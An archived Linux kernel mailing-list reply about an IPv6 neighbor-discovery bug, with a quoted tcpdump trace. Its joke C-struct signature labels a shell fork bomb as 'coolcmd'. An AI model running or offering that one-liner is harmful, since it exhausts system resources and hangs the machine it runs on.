From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S1757860Ab0HQQOI (ORCPT ); Tue, 17 Aug 2010 12:14:08 -0400 Received: from reptilian.habets.pp.se ([193.151.93.131]:1377 "EHLO reptilian.habets.pp.se" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S1757274Ab0HQQOH (ORCPT ); Tue, 17 Aug 2010 12:14:07 -0400 Date: Tue, 17 Aug 2010 18:14:01 +0200 (CEST) From: Thomas Habets X-X-Sender: thompa@red.crap.retrofitta.se To: Thomas Habets cc: Eric Dumazet , linux-kernel@vger.kernel.org, netdev Subject: Re: BUG: IPv6 stops working after a while, needs ip ne del command to reset In-Reply-To: Message-ID: References: <1281953960.2524.23.camel@edumazet-laptop> <1282024802.2487.687.camel@edumazet-laptop> <1282050920.2448.47.camel@edumazet-laptop> User-Agent: Alpine 1.10 (DEB 962 2008-03-14) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed Sender: linux-kernel-owner@vger.kernel.org List-ID: X-Mailing-List: linux-kernel@vger.kernel.org On Tue, 17 Aug 2010, Thomas Habets wrote: > [ here i run "ip l set promisc on eth0" ] [...] > 2a00:800:752:1::5c:2 > 2a00:800:752:1::5c:1: ICMP6, echo request > 2a00:800:752:1::5c:1 > 2a00:800:752:1::5c:2: ICMP6, echo reply I should add that I turned promisc mode back off at about here. Otherwise the ND would work properly right after the "clear ipv6 neigbors" command. > [ here I run "clear ipv6 neigbors" again ] > 2a00:800:752:1::5c:2 > 2a00:800:752:1::5c:1: ICMP6, echo request > 2a00:800:752:1::5c:2 > 2a00:800:752:1::5c:1: ICMP6, echo request --------- typedef struct me_s { char name[] = { "Thomas Habets" }; char email[] = { "thomas@habets.pp.se" }; char kernel[] = { "Linux" }; char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" }; char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" }; char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" }; } me_t;